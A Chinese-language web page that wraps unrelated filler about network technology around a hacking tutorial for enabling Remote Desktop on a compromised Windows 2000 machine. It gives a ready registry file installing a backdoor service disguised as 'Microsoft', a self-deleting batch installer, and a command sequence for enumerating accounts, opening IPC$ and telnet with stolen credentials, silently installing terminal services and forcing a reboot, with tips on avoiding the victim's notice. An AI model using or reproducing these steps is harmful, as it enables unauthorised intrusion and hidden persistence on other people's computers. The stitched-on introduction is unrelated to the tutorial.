|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 首先我們制作開啟3389的工具 先把下面的注冊表內容copy一份,另存為3389.reg注冊表文件 注冊表內容: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] "Enabled"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "ShutdownWithoutLogon"="0" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "EnableAdminTSRemote"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] "TSEnabled"=dword:00000001 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] "Start"=dword:00000002 [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] "Hotkey"="1" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 "ObjectName"="LocalSystem" "Type"=dword:00000010 "Description"="Microsoft" "DisplayName"="Microsoft" 再把下面的內容保存為批處理文件3389.bat 安裝批處理內容: copy termsrv.exe eventlog.exe regedit.exe /s 3389.reg del 3389.reg del 3389.exe del 3389.bat 用winrar制作成exe自解壓縮包 61.188.***.*** user:administrato pass:空 先使用工具letmein判斷其操作系統 letmein \\ip -all -d TsInternetUser (TsInternetUser)這個是2000的終端用戶,現在可以判斷其為2000server了 再使用終端登陸軟件看看他的3389是不是已經開啟了免了費事折騰 應該沒有開啟了 建立ipc連接 copy工具過去 net use \\ip\ipc$ "pass" /user:name copy file \\ip\admin$\system32 用opentelnet開對方的telnet opentelnet \\ip name pass 1 99 用telnet進入 進入到對方的winnt\system32\ 目錄 解壓縮3389.exe 運行安裝批處理3389.bat 現在我們把對方重起一下,用reboot 我們用ping命令監視他的上線情況,等他下線,呵呵下了,又上來了,不慌連,3389等會才能好,對方的機器有點慢 看見了么,開啟成功! 現在開始. 假設我們拿到了一個主機的管理員帳戶和密碼. 主機: 192.168.0.1 帳號: administrator 密碼: 7788 2000系統安裝在c:\winnt下 從上面的的介紹可以知道,2000專業版是不可以遠程安裝終端服務的,那我們就要首先來 判斷此主機是專業版還是服務器版,才能進入下一個環節. 我們可以先用對方所開帳戶判斷: c:\>letmein \\192.168.0.1 -all -d stating connecting to server ... Server local time is: 2002-1-13 10:19:22 Start get all users form server... -------------------------- Total = 5 -------------------------- num0= Administrator () num1= Guest () num2= IUSR_servername (Internet 來賓帳號 ) num3= IWAM_servername (啟動 IIS 進程帳號) num4= TsInternetUser (TsInternetUser) -------------------------- Total = 5 -------------------------- 一般情況num2/3/4這三個帳戶都是2000server默認開啟的. 2000專業版默認是不開這些帳戶的. 我們也可以掃描對方開放的端口進一步確認: 用掃描軟件如:superscan3.exe掃描對方所開端口 判斷對方是否開啟25,3372等2000server默認開啟的端口. 當然我們還可以使用一些工具,如:cmdinfo.zip 這2個東東可以獲得本地或遠程NT/2K主機的版本,系統路徑,源盤路徑,PACK版本,安裝時間等一 系列信息,一個圖形界面,一個命令行. 通過返回的信息就可以很清楚的了解對方主機情況. 還有一些其他的方法來判斷,如:從對方所開的服務來確定等, 從上面的判斷準確率還算高,別的就不一一說明了. 如果你在以上步驟里發現對方主機并沒有那3個帳戶,默認端口也沒開, 或cmdinfo返回的信息對方是2000專業版,你就要放棄安裝3389的計劃了. 現在我們要進入下一環節: 判斷終端服務到底有沒有安裝? 你也許要問:為什么還要判斷啊?我掃描沒有發現3389端口啊? 這里就需要解釋一下,如果裝了終端服務組件,可能有哪幾種情況掃描不到3389端口? 1.終端服務termservice在"管理工具">>>"服務"中被禁用. 2.終端服務連接所需的RDP協議在"管理工具">>>"終端服務配置"中被停用連接. 3.終端服務默認連接端口3389被人為的改變.如何改變請看修改終端服務默認的3389端口(圖文) 4.終端服務綁定的網絡適配器不是外網的. 5.防火墻和端口過濾之類的問題. 6.....(還有我沒想到的) 其實,我們遇到最多的情況就是以上5種情況. 現在開始判組件是否被安裝. 先與遠程主機連接,映射遠程主機C盤為本地Z盤 net use z: \\192.168.0.1\c$ "7788" /user:"administrator" 命令成功完成。 然后轉到Z盤,檢查 Z:\Documents and Settings\All Users\「開始」菜單\程序\管理工具> 里是否有 "終端服務管理器"和"終端服務配置"的快捷方式文件 如有已安裝服務組件的會有,反之,沒有(98% 人為故意刪的可能性較小) 我們還可以在下一步telnet到對方主機后使用終端服務自帶的命令進一步的核實. 判斷完畢,對方好像是沒有安裝終端服務組件,可以進入下一步: telnet登陸對方主機,準備安裝服務組件. 在這里,我強烈建議使用2000自帶的telnet服務端登陸, 有回顯,不容易出錯.個人感覺使用它,一次成功的比例高很多.(呵呵~,個人理解啊!) 就算沒有開,打開用完后再關掉就完了. .abu.寫的最快速登錄WIN2K TELNET 服務已經把這個方法介紹的非常詳細, 而且他的辦法(在本機建立同名,同密碼帳戶),讓快速實現telnet登陸成為現實. 假如我們已開啟對方23端口, telnet 192.168.0.1 輸入用戶名/密碼 *=============================================================== 歡迎使用 Microsoft Telnet 服務器。 *=============================================================== C:\> \\成功進入!!!! 進入后,再次檢查終端組件是否安裝: c:\>query user 這個工具需要安裝終端服務. 這樣就進一步確定了組件沒有被安裝.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 運行中 . 2002-1-12 22:5 \\類似這樣的信息,可能組件就已安裝. 好!都清楚了,可以開始安裝了. --------------------------------------------------- C:\>dir c:\sysoc.inf /s //檢查INF文件的位置 c:\WINNT\inf 的目錄 2000-01-10 20:00 3,770 sysoc.inf 1 個文件 3,770 字節 ----------------------------------------------------- C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序 c:\WINNT\system32 的目錄 2000-01-10 20:00 42,768 sysocmgr.exe 1 個文件 42,768 字節 ----------------------------------------------------- c:\>echo [Components] > c:\wawa c:\>echo TSEnable = on >> c:\wawa //這是建立無人參與的安裝參數 c:\>type c:\wawa [Components] TSEnable = on //檢查參數文件 ------------------------------------------------------ c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q ----------------------------------------------------- 這一條就是真正安裝組件的命令. 以上這條命令沒有加/R參數,主機在安裝完后自動重起. 如若加了/R參數主機就不會重起. 如果一切正常的話,幾分鐘后對方主機將會離線,當它重新回來時, 3389終端服務就已經開啟.你就可以連上去了. 問題和建議: A 在安裝過程中,不使用/R,有時主機也不會重起,你就要手動重起他,但在使用諸如:iisreset /reboot命令時,對方 的屏幕會出現個對話框,寫著誰引起的這次啟動,離重起還有多少秒. B 一次不行可以再試一次,在實際中很有作用. C 在輸入sysocmgr命令開始安裝時,一定不要把命令參數輸錯,那會在對方出現一個大的對話框,是sysocmgr的幫助,很是顯眼, 而且要求確定.在你的屏幕上是不會有任何反應的,你不會知道出錯,所以會有B的建議. 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(peng896066052@126.com),我們會及時處理.
Copyright © 2018-2020 雨林木風下載站
